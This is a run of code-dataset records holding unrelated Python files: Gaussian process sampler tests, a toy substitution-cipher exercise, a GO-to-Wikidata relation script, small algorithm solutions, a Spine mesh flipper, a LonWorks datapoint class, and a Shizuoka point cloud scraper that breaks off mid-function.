#print(np.linalg.norm(sampler.pred_samples))\n\n        ntrain_samples = 20\n        new_samples1 = sampler(ntrain_samples)[0].copy()\n\n        A_inv = np.linalg.inv(kernel(sampler.training_samples.T))\n        P = sampler.compute_P(sampler.training_samples)\n        val1 = 1-np.trace(A_inv.dot(P))\n        A_inv = np.linalg.inv(kernel(sampler.init_guess.T))\n        P = sampler.compute_P(sampler.init_guess)\n        val2 = 1-np.trace(A_inv.dot(P))\n        \n        # can't just call sampler.objective here because self.training_points\n        # has been updated and calling objective(sampler.training_samples)\n        # will evaluate objective with training samples repeated twice.\n        # Similarly init guess will be concatenated with self.training_samples\n        # if passed to objective at this point\n        print(val1, val2)\n        assert (val1 < val2)\n\n        new_samples2 = sampler(2*ntrain_samples)[0]\n        assert np.allclose(\n            1+sampler.greedy_sampler.best_obj_vals[ntrain_samples-1], val1)\n\n        assert np.allclose(\n            new_samples1, sampler.training_samples[:, :ntrain_samples],\n            atol=1e-12)\n\n        assert np.allclose(\n            sampler.greedy_sampler.training_samples[:, :ntrain_samples],\n            new_samples1, atol=1e-12)\n        \n        A_inv = np.linalg.inv(kernel(sampler.training_samples.T))\n        P = sampler.compute_P(sampler.training_samples)\n        val1 = 1-np.trace(A_inv.dot(P))\n\n        #init guess used by optimizer does not contain\n        #fixed training points already selected, so add them here \n        greedy_samples = np.hstack([sampler.training_samples[:,:ntrain_samples],\n                                    sampler.init_guess])\n        A_inv = np.linalg.inv(kernel(greedy_samples.T))\n        P = sampler.compute_P(greedy_samples)\n        val2 = 1-np.trace(A_inv.dot(P))\n        print(val1, val2)\n        assert (val1 < val2)\n        \n        # plt.plot(sampler.training_samples[0, :],\n        #          sampler.training_samples[1, :], 'o')\n        # plt.plot(sampler.greedy_sampler.training_samples[0, :],\n        #          sampler.greedy_sampler.training_samples[1, :], 'x')\n        # plt.plot(sampler.init_guess[0, :],\n        #          sampler.init_guess[1, :], '^')\n        # plt.show()\n\n    def test_greedy_gauss_quadrature_ivar_sampler_I(self):\n        nvars = 2\n        variables = pya.IndependentMultivariateRandomVariable(\n            [stats.beta(20, 20)]*nvars)\n        generate_random_samples = partial(\n            pya.generate_independent_random_samples, variables)\n\n        kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n        np.random.seed(1)\n        sampler1 = 
GreedyIntegratedVarianceSampler(\n nvars, 100, 10, generate_random_samples,\n variables, use_gauss_quadrature=True, econ=True)\n sampler1.set_kernel(kernel)\n np.random.seed(1)\n sampler2 = GreedyIntegratedVarianceSampler(\n nvars, 100, 10, generate_random_samples,\n variables, use_gauss_quadrature=True, econ=False)\n sampler2.set_kernel(kernel)\n\n obj_vals1 = sampler1.objective_vals_econ()\n obj_vals2 = sampler2.objective_vals()\n assert np.allclose(obj_vals1, obj_vals2)\n pivot1 = sampler1.refine_econ()\n pivot2 = sampler2.refine_naive()\n assert np.allclose(pivot1, pivot2)\n\n for nsamples in range(1,5+1):\n #refine functions update internal variables so reset\n np.random.seed(1)\n sampler1 = GreedyIntegratedVarianceSampler(\n nvars, 50, 1000, generate_random_samples,\n variables, use_gauss_quadrature=True, econ=True)\n np.random.seed(1)\n sampler2 = GreedyIntegratedVarianceSampler(\n nvars, 50, 1000, generate_random_samples,\n variables, use_gauss_quadrature=True, econ=False)\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n sampler1.set_kernel(kernel)\n sampler2.set_kernel(kernel)\n #print('nsamples',nsamples)\n sampler1(nsamples)\n sampler2(nsamples)\n\n obj_vals1 = sampler1.objective_vals_econ()\n obj_vals2 = sampler2.objective_vals()\n obj_vals3 = sampler1.vectorized_objective_vals_econ()\n #print(obj_vals1, obj_vals2)\n #print(obj_vals1, obj_vals3)\n assert np.allclose(obj_vals1, obj_vals2)\n assert np.allclose(obj_vals1, obj_vals3)\n pivot1 = sampler1.refine_econ()\n pivot2 = sampler2.refine_naive()\n #print(pivot1, pivot2)\n assert np.allclose(pivot1, pivot2)\n\n def check_greedy_monte_carlo_ivar_sampler(\n self, nvars, kernel, kernels_1d):\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n\n use_gauss_quadrature = False\n np.random.seed(1)\n sampler1 = GreedyIntegratedVarianceSampler(\n nvars, 2000, 1000, generate_random_samples,\n variables, use_gauss_quadrature=use_gauss_quadrature, econ=True,\n compute_cond_nums=True)\n sampler1.set_kernel(kernel, kernels_1d = kernels_1d)\n np.random.seed(1)\n sampler2 = GreedyIntegratedVarianceSampler(\n nvars, 2000, 1000, generate_random_samples,\n variables, use_gauss_quadrature=use_gauss_quadrature, econ=False,\n compute_cond_nums=True)\n sampler2.set_kernel(kernel, kernels_1d = kernels_1d)\n assert np.allclose(sampler1.pred_samples,sampler2.pred_samples)\n\n nsamples = 20\n # nsamples = 100\n \n t0 = time.time()\n samples1 = sampler1(nsamples)[0]\n assert np.allclose(\n sampler1.L[:nsamples, :nsamples],\n np.linalg.cholesky(kernel(sampler1.training_samples.T)))\n time1 = time.time()-t0\n print(time1)\n\n # samples = np.random.beta(20, 20, (nvars, 1000))\n samples = sampler1.pred_samples\n variance = gaussian_process_pointwise_variance(\n kernel, samples, sampler1.training_samples)\n assert np.allclose(variance.mean(), 1+sampler1.best_obj_vals[-1])\n\n t0 = time.time()\n samples2 = sampler2(nsamples)[0]\n time2 = time.time()-t0\n print(time1, time2)\n assert time1 < time2\n\n assert np.allclose(samples1, samples2)\n\n # if nvars !=2:\n # return\n # plt.plot(samples1[0,:], samples1[1,:], 'o')\n # plt.plot(samples2[0,:], samples2[1,:], 'x')\n # plt.figure()\n # print(np.arange(len(sampler1.cond_nums))+1,sampler1.cond_nums)\n # plt.loglog(np.arange(len(sampler1.cond_nums))+1,sampler1.cond_nums)\n # plt.loglog(np.arange(len(sampler2.cond_nums))+1,sampler2.cond_nums)\n # plt.show()\n\n def 
test_greedy_monte_carlo_ivar_sampler_II(self):\n #TODO Add check to IVAR and VarofMean samplers to make sure\n #kernel and 1d_kernels are consistent\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n kernels_1d = None\n self.check_greedy_monte_carlo_ivar_sampler(2, kernel, kernels_1d)\n\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=2.5)\n kernels_1d = None\n self.check_greedy_monte_carlo_ivar_sampler(2, kernel, kernels_1d)\n\n def test_greedy_variance_of_mean_sampler(self):\n nvars = 2\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n\n sampler = GreedyVarianceOfMeanSampler(\n nvars, 1000, 10, generate_random_samples,\n variables, use_gauss_quadrature=True, econ=True)\n kernel = pya.Matern(.4, length_scale_bounds='fixed', nu=np.inf)\n sampler.set_kernel(kernel)\n \n sampler.nmonte_carlo_samples = 100000\n sampler.precompute_monte_carlo()\n tau_mc = sampler.tau.copy()\n sampler.nmonte_carlo_samples = 50\n sampler.precompute_gauss_quadrature()\n tau_gq = sampler.tau.copy()\n #print((tau_mc-tau_gq)/tau_mc)\n assert np.allclose(tau_mc, tau_gq, rtol=1e-2)\n\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n\n use_gauss_quadrature = False\n nquad_samples = 10000\n # use_gauss_quadrature = True\n # nquad_samples = 50\n np.random.seed(1)\n sampler1 = GreedyVarianceOfMeanSampler(\n nvars, nquad_samples, 1000, generate_random_samples,\n variables, use_gauss_quadrature=use_gauss_quadrature, econ=True,\n compute_cond_nums=True)\n sampler1.set_kernel(kernel)\n \n ntrain_samples = 20\n new_samples11 = sampler1(ntrain_samples)[0]\n new_samples12 = sampler1(2*ntrain_samples)[0]\n\n np.random.seed(1)\n sampler2 = GreedyVarianceOfMeanSampler(\n nvars, nquad_samples, 1000, generate_random_samples,\n variables, use_gauss_quadrature=use_gauss_quadrature, econ=False,\n compute_cond_nums=True)\n sampler2.set_kernel(kernel)\n\n new_samples21 = sampler2(ntrain_samples)[0]\n new_samples22 = sampler2(2*ntrain_samples)[0]\n\n # plt.plot(sampler1.training_samples[0, :],\n # sampler1.training_samples[1, :], 'o')\n # plt.plot(sampler2.training_samples[0, :],\n # sampler2.training_samples[1, :], 'x')\n # plt.figure()\n # print(np.arange(len(sampler1.cond_nums))+1,sampler1.cond_nums)\n # plt.loglog(np.arange(len(sampler1.cond_nums))+1,sampler1.cond_nums)\n # plt.loglog(np.arange(len(sampler2.cond_nums))+1,sampler2.cond_nums)\n # plt.show()\n \n assert np.allclose(new_samples11, new_samples21)\n # Note: The sequences computed with econ on and off will diverge\n # when the sample sets produce a kernel matrix with a large condition\n # number\n assert np.allclose(new_samples12, new_samples22)\n \n def compare_ivar_samplers(self):\n nvars = 2\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n\n # correlation length affects ability to check gradient. 
As the kernel matrix\n        # gets more ill-conditioned, the gradients get worse\n        kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n        sampler = IVARSampler(\n            nvars, 1000, 1000, generate_random_samples, variables, 'ivar')\n        sampler.set_kernel(kernel)\n\n        ntrain_samples = 10\n        new_samples1 = sampler(ntrain_samples)[0]\n\n        new_samples2 = sampler(2*ntrain_samples)[0]\n\n        assert np.allclose(\n            sampler.training_samples[:, :ntrain_samples], new_samples1,\n            atol=1e-12)\n\n        np.random.seed(1)\n        sampler2 = IVARSampler(\n            nvars, 1000, 1000, generate_random_samples, variables, 'chol')\n        sampler2.set_kernel(kernel)\n        \n        def weight_function(samples):\n            return np.prod([variables[ii].pdf(samples[ii,:])\n                            for ii in range(samples.shape[0])],axis=0)\n        \n        sampler2.set_weight_function(weight_function)\n        \n        sampler2(ntrain_samples)\n        sampler2(ntrain_samples*2) \n        \n        # plt.plot(sampler.training_samples[0, :],\n        #          sampler.training_samples[1, :], 'o')\n        # plt.plot(sampler2.training_samples[0, :],\n        #          sampler2.training_samples[1, :], 'x')\n        # plt.show()\n\n    \nif __name__ == \"__main__\":\n    gaussian_process_test_suite = unittest.TestLoader().loadTestsFromTestCase(\n        TestGaussianProcess)\n    unittest.TextTestRunner(verbosity=2).run(gaussian_process_test_suite)\n    sampler_test_suite = unittest.TestLoader().loadTestsFromTestCase(\n        TestSamplers)\n    unittest.TextTestRunner(verbosity=2).run(sampler_test_suite)\n    \n    \n","sub_path":"pyapprox/tests/test_gaussian_process.py","file_name":"test_gaussian_process.py","file_ext":"py","file_size_in_byte":58854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"421459103","text":"\"\"\"\nIn this exercise, you will create a Python class for creating simple\nsubstitution ciphers. You are free to implement the required functionality\nhowever you would like, but I highly recommend using Python's string\nmaketrans() method.\n\nImagine that you want to replace all the lower case letters of the alphabet\nwith the corresponding letter of the reverse alphabet (i.e., you want to replace\na with z, b with y, c with x, d with w, and so on.)\n\nFirst let's create a string of the lower case letters:\n\n>>> alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n\nNow let's reverse the alphabet:\n\n>>> alphabet[::-1]\n'zyxwvutsrqponmlkjihgfedcba'\n>>> key = alphabet[::-1]\n\nYou can now make a little translation table using maketrans by passing it a\nstring containing the characters you want to replace and another string with the\ncharacters you want them to be replaced by:\n\n>>> import string\n>>> translator = string.maketrans(alphabet, key)\n\nNote that you can give it any characters you want, not just letters. But the\ntwo strings that you call maketrans with must be the same length.\n\nNow you can call the translate method of any string with the translation table\nand it will return the translated message.\n\n>>> msg = \"hello\"\n>>> msg.translate(translator)\n'svool'\n>>> coded = msg.translate(translator)\n>>> decoded = coded.translate(translator)\n>>> decoded\n'hello'\n\"\"\"\n\nimport string\n\nclass Cipher(object):\n    \"\"\"\n    >>> reverse = Cipher(\"reverse\")\n    >>> reverse.encrypt(\"hello\")\n    'svool'\n    >>> reverse.decrypt(\"svool\")\n    'hello'\n    >>> rot13 = Cipher(\"rot13\")\n    >>> rot13.encrypt(\"hello\")\n    'uryyb'\n    >>> rot13.encrypt(\"abcdefghijklmnopqrstuvwxyz\")\n    'nopqrstuvwxyzabcdefghijklm'\n    >>> rot13.isvalid(\"hello\")\n    True\n    >>> rot13.isvalid(\"H3aff\")\n    False\n    >>> hybrid = Cipher(\"hybrid\")\n    >>> hybrid.encrypt(\"abcdefghijklmnopqrstuvwxyz\")\n    'nmlkjihgfedcbazyxwvutsrqpo'\n    \"\"\"\n\n    def __init__(self, mapping):\n        \"\"\"\n        The constructor method.\n        \"\"\"\n        self.alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n        a = self.alphabet\n        if mapping == \"reverse\":\n            key = a[::-1]\n        elif mapping == \"rot13\":\n            key = a[13:] + a[:13]\n        elif mapping == \"hybrid\":\n            key = a[13::-1] + a[:13:-1]\n        else:\n            raise ValueError(\"Mapping must be 'reverse', 'rot13', or 'hybrid', was %s.\" % mapping)\n        self.translator = string.maketrans(a, key)\n\n    def isvalid(self, message):\n        \"\"\"\n        Checks whether a string is valid for this class.\n        \n        Parameters\n        ----------\n        message : string\n            A string (i.e., you can assume you get a string)\n        \n        Returns\n        -------\n        out : bool\n            Returns True, if message is only composed of letters\n            in our alphabet (and False otherwise).\n        \"\"\"\n        return set(message).issubset(set(self.alphabet))\n\n    def encrypt(self, message):\n        \"\"\"\n        Encrypt the message\n        \n        Parameters\n        ----------\n        message: string\n            A string (i.e., you can assume you get a string)\n        \n        Returns\n        -------\n        out : string\n        \"\"\"\n        return message.translate(self.translator)\n        \n    def decrypt(self, message):\n        \"\"\"\n        Decrypt the message\n        \n        Parameters\n        ----------\n        message: string\n            A string (i.e., you can assume you get a string)\n        \n        Returns\n        -------\n        out : string\n        \"\"\"\n        return message.translate(self.translator)\n\n\nif __name__ == \"__main__\":\n    import doctest\n    doctest.testmod()\n","sub_path":"ex2/cipher-solution.py","file_name":"cipher-solution.py","file_ext":"py","file_size_in_byte":3608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"646433357","text":"\nimport pronto, six, csv\nfrom sys import *\n\nreader = csv.DictReader(open('chebi.tab', 'r'), delimiter='\\t')\nqs = {}\ndups = set()\nfor item in reader:\n iturl = item.get('item')\n qit = iturl[iturl.rfind('/')+1:]\n chid = 'CHEBI:' + item.get('ch')\n g = qs.get(chid)\n if g is None:\n qs[chid] = qit\n else:\n dups.add(chid)\n\nreader = csv.DictReader(open('goid.tab', 'r'), delimiter='\\t')\nefs = {}\nfor item in reader:\n go = item.get('goid')\n iturl = item.get('item')\n it = iturl[iturl.rfind('/')+1:]\n git = efs.get(go)\n if git is None:\n efs[go] = it\n else:\n print('============= {}'.format(go))\n\nignore = {'425228', '144646', '27941'}\n\nsecondary = {'365419':'64090', '12800':'46570', '24036':'72010',\n '425228':'29484', '578003':'65172', '22318':'134249',\n '30410':'42121', '3736':'48947', '593038':'49537',\n '198346':'41688', '22473':'32988', '3669':'16822',\n '23008':'16646', '3736':'48947', '578003':'65172'}\n\nont = pronto.Ontology('/home/ralf/go-ontology/src/ontology/go-edit.obo')\n\nfor term in ont.terms.values():\n goid = term.id\n if goid[:3] != 'GO:':\n continue\n goit = efs.get(goid)\n if goit is None:\n continue\n rel = term.relations\n for relstr in ['has_input', 'has_intermediate', 'has_output', 'has_participant', 'has_part', 'exports', 'transports_or_maintains_localization_of']:\n R = pronto.relationship.Relationship(relstr)\n ix = rel.get(R)\n if ix is None:\n continue\n #ns = term.other.get('namespace')\n #if ns[0] != 'biological_process':\n # continue\n for term in ix:\n chid = term.id\n chit = qs.get(chid)\n if chid in dups or chit is None:\n continue\n type = relstr\n if type == 'has_output' or type == 'has_primary_output':\n print('{}|P527|{}|P3831|Q542929|S248|Q75154902'.format(goit, chit))\n #print('-{}|P361|{}'.format(chit, goit))\n print('{}|P361|{}|P2868|Q542929|S248|Q75154902'.format(chit, goit))\n if type == 'has_input' or type == 'has_primary_input':\n print('{}|P527|{}|P3831|Q45342565|S248|Q75154902'.format(goit, chit))\n #print('-{}|P361|{}'.format(chit, goit))\n print('{}|P361|{}|P2868|Q45342565|S248|Q75154902'.format(chit, goit))\n if type == 'has_intermediate':\n print('{}|P527|{}|P3831|Q7458208|S248|Q75154902'.format(goit, chit))\n #print('-{}|P361|{}'.format(chit, goit))\n print('{}|P361|{}|P2868|Q7458208|S248|Q75154902'.format(chit, goit))\n if type == 'has_participant' or type == 'has_primary_input_or_output':\n print('{}|P527|{}|P3831|Q75232720|S248|Q75154902'.format(goit, chit))\n #print('-{}|P361|{}'.format(chit, goit))\n print('{}|P361|{}|P2868|Q75232720|S248|Q75154902'.format(chit, goit))\n if type == 'has_part':\n print('{}|P527|{}|S248|Q75154902'.format(goit, chit))\n print('{}|P361|{}|S248|Q75154902'.format(chit, goit))\n if type == 'transports_or_maintains_localization_of' or type == 'exports':\n print('{}|P527|{}|P3831|Q75152245|S248|Q75154902'.format(goit, chit))\n print('{}|P361|{}|P2868|Q75152245|S248|Q75154902'.format(chit, goit))\n\"\"\"\n\"\"\"\n\n","sub_path":"go-relations.py","file_name":"go-relations.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"598722126","text":"#take inputs from keyboard\ndef inputs():\n a, b = input().split()\n c = str(input())\n return int(a), float(b), c\n\n#calculate AT|GC content of given string\ndef content(given_s):\n at, gc = 0, 0\n for base in given_s:\n if base == 'A' or base == 'T':\n at += 1\n if base == 'G' or base == 'C':\n gc += 1\n return at, gc\n\n#probability calculation\ndef calc(given_x, given_AT, given_GC, given_N):\n #probability of getting string == s, with GC content x; formula from http://rosalind.info/problems/prob/\n prob = (((1 - given_x) / 2) ** given_AT) * (((given_x) / 2) ** given_GC) \n #probability in question\n ans = 1 - (1 - prob) ** given_N\n return ans \n \nif __name__ == \"__main__\":\n N, x, s = inputs()\n AT, GC = content(s)\n print('%0.3f' % calc(x, AT, GC, N))\n","sub_path":"hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"566401841","text":"class Solution(object):\n    def shortestWordDistance(self, words, word1, word2):\n        \"\"\"\n        :type words: List[str]\n        :type word1: str\n        :type word2: str\n        :rtype: int\n        \"\"\"\n        # Track the last seen index of each word; -inf marks \"not seen yet\"\n        # so the first distance computed below is +inf and never wins the min.\n        wordMap = {word1:-float('inf'), word2: -float('inf')}\n        minDist = float(\"inf\")\n        for i in xrange(len(words)):\n            if words[i] == word1:\n                # If word1 == word2 the dict has a single key, so this\n                # measures the gap to the previous occurrence of the same word.\n                minDist = min(i - wordMap[word2], minDist)\n                wordMap[word1] = i\n            elif words[i] == word2:\n                minDist = min(i - wordMap[word1], minDist)\n                wordMap[word2] = i\n        return minDist","sub_path":"245_shortest_word_distance_III/hashmap.py","file_name":"hashmap.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"489049204","text":"import sys\nimport json\nimport traceback\n\n# Flip the Y coordinate of every mesh attachment in the skin JSON files\n# passed on the command line, rewriting each file in place.\nargs = sys.argv[1:]\n\n\nfor arg in args:\n    try:\n        file = open(arg, 'r')\n        text = file.read()\n        jsonData = json.loads(text)\n        file.close()\n\n        for skinName in jsonData[\"skins\"][\"default\"]:\n            skinSubName = next(iter(jsonData[\"skins\"][\"default\"][skinName]))\n            skin = jsonData[\"skins\"][\"default\"][skinName][skinSubName]\n\n            if \"type\" in skin:\n                if skin[\"type\"] == \"mesh\":\n                    # Vertices are a flat [x0, y0, x1, y1, ...] list;\n                    # negate only the Y components.\n                    vertices = skin[\"vertices\"]\n                    for i in range(0, len(vertices), 2):\n                        # vertices[i] = vertices[i]*-1\n                        vertices[i + 1] = vertices[i + 1] * -1\n\n        file = open(arg, 'w')\n        file.write(json.dumps(jsonData, indent=2, separators=(\",\", \": \")))\n        file.close()\n    except Exception:\n        traceback.print_exc()\n        input(\"Press enter to close\")","sub_path":"meshOnlyFlipper.py","file_name":"meshOnlyFlipper.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"123183652","text":"\"\"\"ex_control standard datapoint type, originally defined in resource file\nset standard 00:00:00:00:00:00:00:00-0. \"\"\"\n\n\n# Copyright (C) 2013 Echelon Corporation. All Rights Reserved.\n\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\" to\n# deal in the Software without restriction, including without limitation the\n# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\n# This file is generated from device resource files using an automated\n# database to source code conversion process. Grammar and punctuation within\n# the embedded documentation may not be correct, as this data is gathered and\n# combined from several sources. The machine-generated code may not meet\n# compliance with PEP-8 and PEP-257 recommendations at all times.\n# Generated at 23-Sep-2013 09:14.\n\nimport pylon.resources.base\nfrom pylon.resources.standard import standard\nimport pylon.resources.enumerations.ex_control_t\n\n\nclass ex_control(pylon.resources.base.Structure):\n \"\"\"ex_control standard datapoint type. Exclusive control. (status,\n address.).\"\"\"\n\n class control_device_addrType(pylon.resources.base.Structure):\n\n def __init__(self):\n super().__init__(\n key=-1,\n scope=-1\n )\n\n self.__domain_id = pylon.resources.base.Array(\n [\n pylon.resources.base.Scaled(\n size=1,\n signed=False,\n minimum=0,\n maximum=255\n ) for i in range(6)\n ]\n )\n self._register(('domain_id', self.__domain_id))\n\n self.__domain_length = pylon.resources.base.Scaled(\n size=1,\n signed=False,\n minimum=0,\n maximum=6\n )\n self._register(('domain_length', self.__domain_length))\n\n self.__subnet = pylon.resources.base.Scaled(\n size=1,\n signed=False,\n invalid=0,\n minimum=0,\n maximum=255\n )\n self._register(('subnet', self.__subnet))\n\n self.__node = pylon.resources.base.Scaled(\n size=1,\n signed=False,\n invalid=0,\n minimum=0,\n maximum=127\n )\n self._register(('node', self.__node))\n\n def __set_domain_id(self, v):\n self.__domain_id._value = v\n\n domain_id = property(\n lambda self: self.__domain_id._value,\n __set_domain_id,\n None,\n \"\"\"Domain ID. ANSI/CEA-709.1 domain ID. (array of 6 bytes.).\"\"\"\n )\n\n def __set_domain_length(self, v):\n self.__domain_length._value = v\n\n domain_length = property(\n lambda self: self.__domain_length._value,\n __set_domain_length,\n None,\n \"\"\"Domain length. Valid domain lengths are 0, 1, 3, and 6.\n (ANSI/CEA-709.1 domain length.).\"\"\"\n )\n\n def __set_subnet(self, v):\n self.__subnet._value = v\n\n subnet = property(\n lambda self: self.__subnet._value,\n __set_subnet,\n None,\n \"\"\"Subnet There can be 255 subnets (1-255) in a domain. 
(subnet\n number.).\"\"\"\n )\n\n def __set_node(self, v):\n self.__node._value = v\n\n node = property(\n lambda self: self.__node._value,\n __set_node,\n None,\n \"\"\"Node There can be 127 nodes (1-127) in a subnet. (node\n number.).\"\"\"\n )\n\n def __set(self, v):\n if not isinstance(v, type(self)):\n raise TypeError(\n 'Expected instance of {0}, got {1}'.format(\n type(self),\n type(v)\n )\n )\n self.__set_domain_id(v.__domain_id)\n self.__set_domain_length(v.__domain_length)\n self.__set_subnet(v.__subnet)\n self.__set_node(v.__node)\n\n _value = property(lambda self: self, __set)\n\n def __len__(self):\n \"\"\"Return the length of the type, in bytes.\"\"\"\n return 9\n\n def __init__(self):\n super().__init__(\n key=157,\n scope=0\n )\n\n self.__control_status = pylon.resources.enumerations.ex_control_t.ex_control_t(\n )\n self._register(('control_status', self.__control_status))\n\n self.__control_device_addr = ex_control.control_device_addrType(\n )\n self._register(('control_device_addr', self.__control_device_addr))\n self._original_name = 'SNVT_ex_control'\n self._definition = standard.add(self)\n\n\n def __set_control_status(self, v):\n self.__control_status._value = v\n\n control_status = property(\n lambda self: self.__control_status._value,\n __set_control_status,\n None,\n \"\"\"Control type. (control type names.).\"\"\"\n )\n\n def __set_control_device_addr(self, v):\n self.__control_device_addr._value = v\n\n control_device_addr = property(\n lambda self: self.__control_device_addr._value,\n __set_control_device_addr,\n None,\n \"\"\"Control device address. (LonWorks subnet-node address.).\"\"\"\n )\n\n def __set(self, v):\n if not isinstance(v, type(self)):\n raise TypeError(\n 'Expected instance of {0}, got {1}'.format(\n type(self),\n type(v)\n )\n )\n self.__set_control_status(v.__control_status)\n self.__set_control_device_addr(v.__control_device_addr)\n\n _value = property(lambda self: self, __set)\n\n def __len__(self):\n \"\"\"Return the length of the type, in bytes.\"\"\"\n return 10\n\n\nif __name__ == '__main__':\n # unit test code.\n item = ex_control()\n pass\n","sub_path":"pylon/resources/datapoints/ex_control.py","file_name":"ex_control.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"411576389","text":"import urllib.request, urllib.parse\nimport json\nimport time\n\ndef getMarkers():\n #全件取得するために、静岡県全域が含まれる緯度経度を整数値で設定\n xMax = 140\n xMin = 137\n yMax = 36\n yMin = 33\n\n params = {\n 'request':'MarkerSet',\n 'Xmax':xMax,\n 'Xmin':xMin,\n 'Ymax':yMax,\n 'Ymin':yMin\n }\n p = urllib.parse.urlencode(params)\n\n url = \"https://pointcloud.pref.shizuoka.jp/lasmap/ankenmapsrc?\" + p\n\n #上記で生成したURLパラメータでSIZUOKA POINT CLOUD DBにリクエストし案件一覧文字列を取得\n allAnkenStr = \"\"\n with urllib.request.urlopen(url) as res:\n allAnkenStr = res.read().decode()\n\n #以下はDBから得られる文字列のサンプル\n #本来は改行されていない\n\n #30XXX01010001:平成30年度韮山反射炉計測業務:138.96214537214:35.03962001009?\n #28XXX00030007:白糸の滝滝見橋周辺整備事業 その7:138.58870495572:35.312506370532?\n #28XXX00030008:白糸の滝滝見橋周辺整備事業 その8:138.58881502806:35.312596432406?\n #28XXX00030009:白糸の滝滝見橋周辺整備事業 その9:138.58892510063:35.312686494178?\n #29C2001011361:平成29年度[第29-C2001-01号] 伊豆半島の屋外広告物の実態調査業務委託(函南町道_1-2号線):138.93794860595:35.083520492945\n\n #案件ごとの区切りは'?'、1案件中の区切りは':'である\n\n ankensObj = {\n \"ankenList\":[]\n }\n\n ankenList = allAnkenStr.split('?')\n for anken in ankenList:\n ankenInfo = anken.split(':')\n #不適切なデータがあった場合、スキップする\n if len(ankenInfo) != 4:\n continue\n\n #和暦を西暦に変換\n yy = int(ankenInfo[0][:2])\n #令和\n if yy < 24:\n yyyy = 2018 + yy\n else:\n yyyy = 1988 + yy\n\n ankenObj = {\n \"no\":ankenInfo[0],\n \"name\":ankenInfo[1],\n \"lon\":ankenInfo[2],\n \"lat\":ankenInfo[3],\n \"year\":yyyy\n }\n ankensObj['ankenList'].append(ankenObj)\n return ankensObj\n\nimport bs4\ndef getAnkenDetail(ankenNo):\n params = {\n 'ankenno':ankenNo\n }\n p = urllib.parse.urlencode(params)\n url = \"https://pointcloud.pref.shizuoka.jp/lasmap/ankendetail?\" + p\n\n opener = urllib.request.build_opener()\n opener.addheaders = [\n ('Referer', 'http://localhost'),\n ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Edg/79.0.309.65'),\n ]\n\n html = opener.open(url)\n soup = bs4.BeautifulSoup(html, features='html.parser')\n #